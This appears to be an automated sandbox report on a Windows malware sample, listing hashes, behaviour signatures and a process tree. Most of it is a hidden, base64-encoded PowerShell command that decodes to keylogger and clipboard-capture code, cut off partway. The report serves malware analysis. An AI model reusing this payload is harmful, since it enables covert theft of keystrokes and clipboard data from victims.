c0cbd6339026f42a838278795dbf8fa5ac11d8f6fb751e50289847b01a736823

General

Target

3b910dce05a7207cd1ad34af2b24e428.exe
Size

388KB
MD5

3b910dce05a7207cd1ad34af2b24e428
SHA1

f3c01d2c305a1b3a737ad2b73c3ba22558fc94f7
SHA256

c0cbd6339026f42a838278795dbf8fa5ac11d8f6fb751e50289847b01a736823
SHA512

8683a976b8f376dee448e285fa396b333444af3164083e93b7ab86902a3ea79a9d241494f9e20112967d3fd35fa881279ffc071791fbf9c5581829bb75a04524
SSDEEP

6144:pOYGXaPNxdgSdcq2pVZPOJHAbKSXXIEmqF4fmq7k3ivPjVbdgZ/:1GqN/XdctpVtkiXXIEduOZij34

Score

10^/10

Malware Config

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

wscript.exepowershell.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4296	3020	wscript.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1592	3020	powershell.exe

Blocklisted process makes network request 2 IoCs

Processes:

wscript.exe

flow pid process

14 4296 wscript.exe
412 4296 wscript.exe

flow	pid	process
14	4296	wscript.exe
412	4296	wscript.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

3b910dce05a7207cd1ad34af2b24e428.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Control Panel\International\Geo\Nation	3b910dce05a7207cd1ad34af2b24e428.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 4 IoCs

Processes:

wscript.exewscript.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinNT	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinNT\test = "1"	wscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinNT	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinNT\test = "1"	wscript.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exe

pid process

1592 powershell.exe
1592 powershell.exe
1592 powershell.exe
1592 powershell.exe
1592 powershell.exe
Suspicious behavior: RenamesItself 1 IoCs

Processes:

wscript.exe

pid process

4300 wscript.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1592 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

powershell.exe

pid process

1592 powershell.exe

pid	process
1592	powershell.exe
1592	powershell.exe
1592	powershell.exe
1592	powershell.exe
1592	powershell.exe

pid	process
4300	wscript.exe

description	pid	process
Token: SeDebugPrivilege	1592	powershell.exe

pid	process
1592	powershell.exe

Suspicious use of WriteProcessMemory 7 IoCs

Processes:

3b910dce05a7207cd1ad34af2b24e428.exepowershell.execsc.exe

description	pid	process	target process
PID 4240 wrote to memory of 4300	4240	3b910dce05a7207cd1ad34af2b24e428.exe	wscript.exe
PID 4240 wrote to memory of 4300	4240	3b910dce05a7207cd1ad34af2b24e428.exe	wscript.exe
PID 4240 wrote to memory of 4300	4240	3b910dce05a7207cd1ad34af2b24e428.exe	wscript.exe
PID 1592 wrote to memory of 804	1592	powershell.exe	csc.exe
PID 1592 wrote to memory of 804	1592	powershell.exe	csc.exe
PID 804 wrote to memory of 2500	804	csc.exe	cvtres.exe
PID 804 wrote to memory of 2500	804	csc.exe	cvtres.exe

C:\Users\Admin\AppData\Local\Temp\3b910dce05a7207cd1ad34af2b24e428.exe
"C:\Users\Admin\AppData\Local\Temp\3b910dce05a7207cd1ad34af2b24e428.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4240

C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\wscript.exe" 279155113.js 118 "C:\Users\Admin\AppData\Local\Temp\3b910dce05a7207cd1ad34af2b24e428.exe"
2⤵
- Modifies registry class
- Suspicious behavior: RenamesItself
PID:4300

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\7b42de170.js" 118
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Modifies registry class
PID:4296

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc QQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsAdQBzAGkAbgBnACAATQBpAGMAcgBvAHMAbwBmAHQALgBXAGkAbgAzADIAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEkATwA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEMAbwBsAGwAZQBjAHQAaQBvAG4AcwAuAEcAZQBuAGUAcgBpAGMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEEAYwBjAGUAcwBzAEMAbwBuAHQAcgBvAGwAOwBuAGEAbQBlAHMAcABhAGMAZQAgAGoAMQB7AHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABmADIAewBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABwADMAIABvADQAIAA9ACAAYwA1ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAagA2ACAAbgA3ACAAPQAgAGwAOAA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAEkAbgB0AFAAdAByACAAYQA5ACAAPQAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwA7AHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABoADEAMAAgAG8AMQAxADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAGIAMQAyADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAG8AMQAzADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAG4AMQA0ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGgAMQA1ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAG8AMQA2ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGoAMQA3ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABlADEAOAA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAcAAxADkAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAGYAMgAwADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABoADIAMQA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAYQAyADIAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAGkAMgAzADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABlADIANAA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAYgAyADUAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAGoAMgA2ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAASQBuAHQAUAB0AHIAIABkADIANwA7AFsAUwB0AHIAdQBjAHQATABhAHkAbwB1AHQAKABMAGEAeQBvAHUAdABLAGkAbgBkAC4AUwBlAHEAdQBlAG4AdABpAGEAbAAsACAAQwBoAGEAcgBTAGUAdAAgAD0AIABDAGgAYQByAFMAZQB0AC4AQQBuAHMAaQApAF0AcAB1AGIAbABpAGMAIABzAHQAcgB1AGMAdAAgAGMAMgA4AHsAcAB1AGIAbABpAGMAIABzAHQAcgBpAG4AZwAgAG0AMgA5ADsAcAB1AGIAbABpAGMAIABJAG4AdABQAHQAcgAgAGIAMwAwADsAcAB1AGIAbABpAGMAIABVAEkAbgB0ADMAMgAgAHAAMwAxADsAcAB1AGIAbABpAGMAIABVAEkAbgB0ADMAMgAgAG4AMwAyADsAcAB1AGIAbABpAGMAIABVAEkAbgB0ADMAMgAgAG0AMwAzADsAWwBNAGEAcgBzAGgAYQBsAEEAcwAoAFUAbgBtAGEAbgBhAGcAZQBkAFQAeQBwAGUALgBCAHkAVgBhAGwAQQByAHIAYQB5ACwAIABTAGkAegBlAEMAbwBuAHMAdAAgAD0AIAAzADYAKQBdAHAAdQBiAGwAaQBjACAAYgB5AHQAZQBbAF0AIABnADMANAA7AH0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAHYAbwBpAGQAIABSAHUAbgAoAGgAMQAwACAAaQAzADUAKQB7AG8AMQAxACAAPQAgAGkAMwA1ADsAagAxADcAIAA9ACAAbgBlAHcAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACgAKQA7AHAAMQA5ACAAPQAgACIAUwBvAGYAdAB3AGEAcgBlAFwAXABNAGkAYwByAG8AcwBvAGYAdABcAFwAVwBpAG4AZABvAHcAcwBcAFwARABXAE0AIgA7AGYAMgAwACAAPQAgACIASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAXAAiACAAKwAgAHAAMQA5ADsAagAyADYAIAA9ACAARQBuAHYAaQByAG8AbgBtAGUAbgB0AC4ARwBlAHQARQBuAHYAaQByAG8AbgBtAGUAbgB0AFYAYQByAGkAYQBiAGwAZQAoACIAXwBfAFUASQBEAF8ARQBOAFYAXwBWAEEAUgBfAF8AIgApADsAaQBmACAAKABqADIANgAgAD0APQAgAG4AdQBsAGwAKQAgAGoAMgA2ACAAPQAgACIAMQAyADMANAA1ADYANwA4ACIAOwBoADIAMQAgAD0AIABqADIANgAgACsAIAAiAGEAIgA7AGEAMgAyACAAPQAgAGoAMgA2ACAAKwAgACIAZAAiADsAaQAyADMAIAA9ACAAagAyADYAIAArACAAIgBzACIAOwBlADIANAAgAD0AIABqADIANgAgACsAIAAiAG0AIgA7AHUAaQBuAHQAIABoADMANgAgAD0AIABPAHAAZQBuAE0AdQB0AGUAeAAoADAAeAAwADAAMQAwADAAMAAwADAALAAgAGYAYQBsAHMAZQAsACAAZQAyADQAKQA7AGkAZgAgACgAaAAzADYAIAAhAD0AIAAwACkAIABFAHgAaQB0AFAAcgBvAGMAZQBzAHMAKAAwACkAOwBDAHIAZQBhAHQAZQBNAHUAdABlAHgAKABJAG4AdABQAHQAcgAuAFoAZQByAG8ALAAgAHQAcgB1AGUALAAgAGUAMgA0ACkAOwBkADIANwAgAD0AIABJAG4AdABQAHQAcgAuAFoAZQByAG8AOwBpAGYAIAAoAFMAQwBhAHIAZABFAHMAdABhAGIAbABpAHMAaABDAG8AbgB0AGUAeAB0ACgAMgAsACAASQBuAHQAUAB0AHIALgBaAGUAcgBvACwAIABJAG4AdABQAHQAcgAuAFoAZQByAG8ALAAgAG8AdQB0ACAAZAAyADcAKQAgACEAPQAgADAAKQAgAGQAMgA3ACAAPQAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwA7AGUAMQA4ACAAPQAgACIAIgA7AG8AMQAzACAAPQAgAEcAZQB0AEYAbwByAGUAZwByAG8AdQBuAGQAVwBpAG4AZABvAHcAKAApADsAaQBuAHQAIABkADMANwAgAD0AIABHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0AEwAZQBuAGcAdABoACgAbwAxADMAKQA7AG8AMQA2ACAAPQAgAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAoAGQAMwA3ACAAKwAgADEAKQA7AEcAZQB0AFcAaQBuAGQAbwB3AFQAZQB4AHQAKABvADEAMwAsACAAbwAxADYALAAgAGQAMwA3ACAAKwAgADEAKQA7AHUAaQBuAHQAIABuADEANAAgAD0AIAAwADsARwBlAHQAVwBpAG4AZABvAHcAVABoAHIAZQBhAGQAUAByAG8AYwBlAHMAcwBJAGQAKABvADEAMwAsACAAcgBlAGYAIABuADEANAApADsAUAByAG8AYwBlAHMAcwAgAGEAMwA4ACAAPQAgAFAAcgBvAGMAZQBzAHMALgBHAGUAdABQAHIAbwBjAGUAcwBzAEIAeQBJAGQAKAAoAGkAbgB0ACkAbgAxADQAKQA7AGkAZgAgACgAYQAzADgAIAAhAD0AIABuAHUAbABsACkAIABiADIANQAgAD0AIABhADMAOAAuAFAAcgBvAGMAZQBzAHMATgBhAG0AZQA7ACAAZQBsAHMAZQAgAGIAMgA1ACAAPQAgACIAIgA7AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIALgBaAGUAcgBvACwAIAAwACwAIABuADcALAAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsACAAMAAsACAASQBuAHQAUAB0AHIALgBaAGUAcgBvACkAOwBhADkAIAA9ACAAZQAzADkAKABvADQAKQA7AEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFIAdQBuACgAKQA7AFUAbgBoAG8AbwBrAFcAaQBuAGQAbwB3AHMASABvAG8AawBFAHgAKABhADkAKQA7AH0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAASQBuAHQAUAB0AHIAIABlADMAOQAoAHAAMwAgAG8ANAApAHsASQBuAHQAUAB0AHIAIABrADQAMAAgAD0AIABHAGUAdABNAG8AZAB1AGwAZQBIAGEAbgBkAGwAZQAoAFAAcgBvAGMAZQBzAHMALgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAE0AbwBkAHUAbABlAE4AYQBtAGUAKQA7AHIAZQB0AHUAcgBuACAAUwBlAHQAVwBpAG4AZABvAHcAcwBIAG8AbwBrAEUAeAAoADEAMwAsACAAbwA0ACwAIABrADQAMAAsACAAMAApADsAfQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIAB2AG8AaQBkACAAaQA0ADEAKABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACAAaQA0ADIALAAgAHMAdAByAGkAbgBnACAAcAA0ADMALAAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAIABsADQANAApAHsAdAByAHkAewBzAHQAcgBpAG4AZwAgAGMANAA1AGQAYQB0AGEAXwAgAD0AIABSAGUAZwBpAHMAdAByAHkALgBHAGUAdABWAGEAbAB1AGUAKABmADIAMAAsACAAaAAyADEALAAgACIAIgApAC4AVABvAFMAdAByAGkAbgBnACgAKQA7AGMANAA1AGQAYQB0AGEAXwAgAD0AIABjADQANQBkAGEAdABhAF8AIAArACAARABhAHQAZQBUAGkAbQBlAC4ATgBvAHcAIAArACAAIgAgAFsAIgAgACsAIABpADQAMgAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAIgBdACAALQAgACIAIAArACAAcAA0ADMAIAArACAAIgBcAHIAXABuACIAIAArACAAbAA0ADQALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACIAXAByAFwAbgBcAHIAXABuACIAOwBSAGUAZwBpAHMAdAByAHkALgBTAGUAdABWAGEAbAB1AGUAKABmADIAMAAsACAAaAAyADEALAAgAGMANAA1AGQAYQB0AGEAXwApADsAfQBjAGEAdABjAGgAIAB7ACAAfQB9AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGkAbgB0ACAAZwA0ADYAKABJAG4AdABQAHQAcgAgAGoANAA3ACkAewByAGUAdAB1AHIAbgAgAE0AYQByAHMAaABhAGwALgBSAGUAYQBkAEkAbgB0ADMAMgAoAGoANAA3ACkAOwB9AHAAcgBpAHYAYQB0AGUAIABkAGUAbABlAGcAYQB0AGUAIABJAG4AdABQAHQAcgAgAHAAMwAoAGkAbgB0ACAAZAA0ADgALAAgAEkAbgB0AFAAdAByACAAbQA0ADkALAAgAEkAbgB0AFAAdAByACAAYQA1ADAAKQA7AHAAdQBiAGwAaQBjACAAZABlAGwAZQBnAGEAdABlACAAdQBpAG4AdAAgAGoANgAoAEkAbgB0AFAAdAByACAAcABQAGEAcgBhAG0AKQA7AHAAdQBiAGwAaQBjACAAZABlAGwAZQBnAGEAdABlACAAdgBvAGkAZAAgAGgAMQAwACgAKQA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAEkAbgB0AFAAdAByACAAYwA1ACgAaQBuAHQAIABkADQAOAAsACAASQBuAHQAUAB0AHIAIABtADQAOQAsACAASQBuAHQAUAB0AHIAIABhADUAMAApAHsAaQBmACAAKABkADQAOAAgAD4APQAgADAAIAAmACYAIABtADQAOQAgAD0APQAgACgASQBuAHQAUAB0AHIAKQAwAHgAMAAxADAAMAApAHsAaQBuAHQAIABsADUAMQAgAD0AIABnADQANgAoAGEANQAwACkAOwBpAGYAIAAoAGwANQAxACAAPAAgADgAKQAgAHIAZQB0AHUAcgBuACAAQwBhAGwAbABOAGUAeAB0AEgAbwBvAGsARQB4ACgAYQA5ACwAIABkADQAOAAsACAAbQA0ADkALAAgAGEANQAwACkAOwBvADEAMQAoACkAOwBiAG8AbwBsACAAbgA1ADIAIAA9ACAAKABsADUAMQAgAD0APQAgADgAKQA7AGIAbwBvAGwAIABmADUAMwAgAD0AIAAoAGwANQAxACAAPQA9ACAANAA2ACkAOwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACAAZgA1ADQAIAA9ACAAbgBlAHcAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACgAKQA7AGIAeQB0AGUAWwBdACAAZAA1ADUAIAAgAD0AIABuAGUAdwAgAGIAeQB0AGUAWwAyADUANQBdADsAaQBmACAAKABHAGUAdABLAGUAeQBiAG8AYQByAGQAUwB0AGEAdABlACgAZAA1ADUAKQApAHsAdQBpAG4AdAAgAGIANQA2ACAAPQAgAE0AYQBwAFYAaQByAHQAdQBhAGwASwBlAHkAKABsADUAMQAsACAAMwApADsAYgAxADIAIAA9ACAARwBlAHQARgBvAHIAZQBnAHIAbwB1AG4AZABXAGkAbgBkAG8AdwAoACkAOwB1AGkAbgB0ACAAZwA1ADcAIAA9ACAAMAA7AHUAaQBuAHQAIABlADUAOAAgAD0AIABHAGUAdABXAGkAbgBkAG8AdwBUAGgAcgBlAGEAZABQAHIAbwBjAGUAcwBzAEkAZAAoAGIAMQAyACwAIAByAGUAZgAgAGcANQA3ACkAOwB1AGkAbgB0ACAAaQA1ADkAIAA9ACAARwBlAHQASwBlAHkAYgBvAGEAcgBkAEwAYQB5AG8AdQB0ACgAZQA1ADgAKQA7AGkAZgAgACgAbgA1ADIAIAB8AHwAIABmADUAMwAgAHwAfAAgACgAVABvAFUAbgBpAGMAbwBkAGUARQB4ACgAbAA1ADEALAAgAGIANQA2ACwAIABkADUANQAsACAAZgA1ADQALAAgAGYANQA0AC4AQwBhAHAAYQBjAGkAdAB5ACwAIAAoAHUAaQBuAHQAKQAwACwAIABpADUAOQApACAAPgAgADAAKQApAHsAaQBuAHQAIABkADMANwAgAD0AIABHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0AEwAZQBuAGcAdABoACgAYgAxADIAKQA7AGgAMQA1ACAAPQAgAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAoAGQAMwA3ACAAKwAgADEAKQA7AEcAZQB0AFcAaQBuAGQAbwB3AFQAZQB4AHQAKABiADEAMgAsACAAaAAxADUALAAgAGQAMwA3ACAAKwAgADEAKQA7AGkAZgAgACgAKABnADUANwAgACEAPQAgAG4AMQA0ACkAIAB8AHwAIAAoAGIAMQAyACAAIQA9ACAAbwAxADMAKQAgAHwAfAAgACgAbwAxADYALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAIQA9ACAAaAAxADUALgBUAG8AUwB0AHIAaQBuAGcAKAApACkAKQB7AGkANAAxACgAbwAxADYALAAgAGIAMgA1ACwAIABqADEANwApADsAbwAxADYALgBSAGUAbQBvAHYAZQAoADAALAAgAG8AMQA2AC4ATABlAG4AZwB0AGgAKQA7AG8AMQA2AC4AQQBwAHAAZQBuAGQAKABoADEANQApADsAagAxADcALgBSAGUAbQBvAHYAZQAoADAALAAgAGoAMQA3AC4ATABlAG4AZwB0AGgAKQA7AG8AMQAzACAAPQAgAGIAMQAyADsAUAByAG8AYwBlAHMAcwAgAGEAMwA4ACAAPQAgAFAAcgBvAGMAZQBzAHMALgBHAGUAdABQAHIAbwBjAGUAcwBzAEIAeQBJAGQAKAAoAGkAbgB0ACkAZwA1ADcAKQA7AGkAZgAgACgAYQAzADgAIAAhAD0AIABuAHUAbABsACkAIABiADIANQAgAD0AIABhADMAOAAuAFAAcgBvAGMAZQBzAHMATgBhAG0AZQA7ACAAZQBsAHMAZQAgAGIAMgA1ACAAPQAgACIAIgA7AG4AMQA0ACAAPQAgAGcANQA3ADsAfQBpAGYAIAAoAGwANQAxACAAPgAgADcAKQB7AGkAZgAgACgAbgA1ADIAKQAgAGoAMQA3AC4AQQBwAHAAZQBuAGQAKAAiAFsAqwBdACIAKQA7AGUAbABzAGUAIABpAGYAIAAoAGYANQAzACkAIABqADEANwAuAEEAcABwAGUAbgBkACgAIgBbAGQAZQBsAF0AIgApADsAZQBsAHMAZQAgAGoAMQA3AC4AQQBwAHAAZQBuAGQAKABmADUANAApADsAfQB9AH0AfQByAGUAdAB1AHIAbgAgAEMAYQBsAGwATgBlAHgAdABIAG8AbwBrAEUAeAAoAGEAOQAsACAAZAA0ADgALAAgAG0ANAA5ACwAIABhADUAMAApADsAfQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABMAGkAcwB0ADwAcwB0AHIAaQBuAGcAPgAgAGMANgAwACgAYgB5AHQAZQBbAF0AIABiADYAMQApAHsAcwB0AHIAaQBuAGcAIABiADYAMgAgAD0AIABFAG4AYwBvAGQAaQBuAGcALgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAGIANgAxACkAOwBpAGYAIAAoAHMAdAByAGkAbgBnAC4ASQBzAE4AdQBsAGwATwByAEUAbQBwAHQAeQAoAGIANgAyACkAKQAgAHIAZQB0AHUAcgBuACAAbgBlAHcAIABMAGkAcwB0ADwAcwB0AHIAaQBuAGcAPgAoACkAOwByAGUAdAB1AHIAbgAgAG4AZQB3ACAATABpAHMAdAA8AHMAdAByAGkAbgBnAD4AKABiADYAMgAuAFMAcABsAGkAdAAoAG4AZQB3ACAAYwBoAGEAcgBbAF0AIAB7ACAAJwBcADAAJwAgAH0ALAAgAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAC4AUgBlAG0AbwB2AGUARQBtAHAAdAB5AEUAbgB0AHIAaQBlAHMAKQApADsAfQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIAB1AGkAbgB0ACAAbAA4ACgASQBuAHQAUAB0AHIAIABwADYAMwApAHsAYgBvAG8AbAAgAGgANgA0ACAAPQAgAHQAcgB1AGUAOwBzAHQAcgBpAG4AZwAgAHAANgA1ADsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGkANgA2ACAAPQAgAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAoACkAOwB3AGgAaQBsAGUAIAAoAGgANgA0ACkAewBzAHQAcgBpAG4AZwAgAGsANgA3ACAAPQAgAFIAZQBnAGkAcwB0AHIAeQAuAEcAZQB0AFYAYQBsAHUAZQAoAGYAMgAwACwAIABpADIAMwAsACAAIgAiACkALgBUAG8AUwB0AHIAaQBuAGcAKAApADsAaQBmACAAKABrADYANwAgACEAPQAgACIAIgApAHsAUgBlAGcAaQBzAHQAcgB5AEsAZQB5ACAAaQA2ADgAIAA9ACAAUgBlAGcAaQBzAHQAcgB5AC4AQwB1AHIAcgBlAG4AdABVAHMAZQByAC4ATwBwAGUAbgBTAHUAYgBLAGUAeQAoAHAAMQA5ACwAIAB0AHIAdQBlACkAOwBpAGYAIAAoAGkANgA4ACAAIQA9ACAAbgB1AGwAbAApAHsAaQA2ADgALgBEAGUAbABlAHQAZQBWAGEAbAB1AGUAKABpADIAMwApADsAaQA2ADgALgBDAGwAbwBzAGUAKAApADsAfQBFAHgAaQB0AFAAcgBvAGMAZQBzAHMAKAAwACkAOwB9AGkAZgAgACgAQwBsAGkAcABiAG8AYQByAGQALgBDAG8AbgB0AGEAaQBuAHMAVABlAHgAdAAoACkAIAA9AD0AIAB0AHIAdQBlACkAewBwADYANQAgAD0AIABDAGwAaQBwAGIAbwBhAHIAZAAuAEcAZQB0AFQAZQB4AHQAKAApADsAaQBmACAAKABwADYANQAgACEAPQAgAGUAMQA4ACkAewBzAHQAcgBpAG4AZwAgAGsANgA5ACAAPQAgACIAIgA7AFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAIABmADcAMAAgAD0AIABuAGUAdwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAKAApADsAYgAxADIAIAA9ACAARwBlAHQARgBvAHIAZQBnAHIAbwB1AG4AZABXAGkAbgBkAG8AdwAoACkAOwBpAGYAIAAoAGIAMQAyACAAIQA9ACAAMAApAHsAaQBuAHQAIABkADMANwAgAD0AIABHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0AEwAZQBuAGcAdABoACgAYgAxADIAKQA7AGYANwAwAC4AQwBhAHAAYQBjAGkAdAB5ACAAPQAgAGQAMwA3ACAAKwAgADEAOwBHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0ACgAYgAxADIALAAgAGYANwAwACwAIABkADMANwAgACsAIAAxACkAOwB1AGkAbgB0ACAAXwBwAHIAbwBjAF8AaQBkAF8AIAA9ACAAMAA7AGkAZgAgACgARwBlAHQAVwBpAG4AZABvAHcAVABoAHIAZQBhAGQAUAByAG8AYwBlAHMAcwBJAGQAKABiADEAMgAsACAAcgBlAGYAIABfAHAAcgBvAGMAXwBpAGQAXwApACAAIQA9ACAAMAApAHsAUAByAG8AYwBlAHMAcwAgAGEANwAxACAAPQAgAFAAcgBvAGMAZQBzAHMALgBHAGUAdABQAHIAbwBjAGUAcwBzAEIAeQBJAGQAKAAoAGkAbgB0ACkAXwBwAHIAbwBjAF8AaQBkAF8AKQA7AGkAZgAgACgAYQA3ADEAIAAhAD0AIABuAHUAbABsACkAIABrADYAOQAgAD0AIABhADcAMQAuAFAAcgBvAGMAZQBzAHMATgBhAG0AZQA7AH0AfQBmADcAMAAuAEEAcABwAGUAbgBkACgAIgAgADoAOgAgAEMAbABpAHAAYgBvAGEAcgBkACIAKQA7AGkANgA2AC4AUgBlAG0AbwB2AGUAKAAwACwAIABpADYANgAuAEwAZQBuAGcAdABoACkAOwBpADYANgAuAEEAcABwAGUAbgBkACgAcAA2ADUAKQA7AGkANAAxACgAZgA3ADAALAAgAGsANgA5ACwAIABpADYANgApADsAZQAxADgAIAA9ACAAcAA2ADUAOwB9AH0AcwB0AHIAaQBuAGcAIABoADcAMgAgAD0AIAAiACIAOwBjADIAOAAgAGkANwAzADsAaQBmACAAKABkADIANwAgACEAPQAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwApAHsAdQBpAG4AdAAgAGMANwA0ACAAPQAgADEAMAAwADAAMAA7AGIAeQB0AGUAWwBdACAAaAA3ADUAIAA9ACAAbgBlAHcAIABiAHkAdABlAFsAYwA3ADQAXQA7AGkAZgAgACgAUwBDAGEAcgBkAEwAaQBzAHQAUgBlAGEAZABlAHIAcwAoAGQAMgA3ACwAIABuAHUAbABsACwAIABoADcANQAsACAAbwB1AHQAIABjADcANA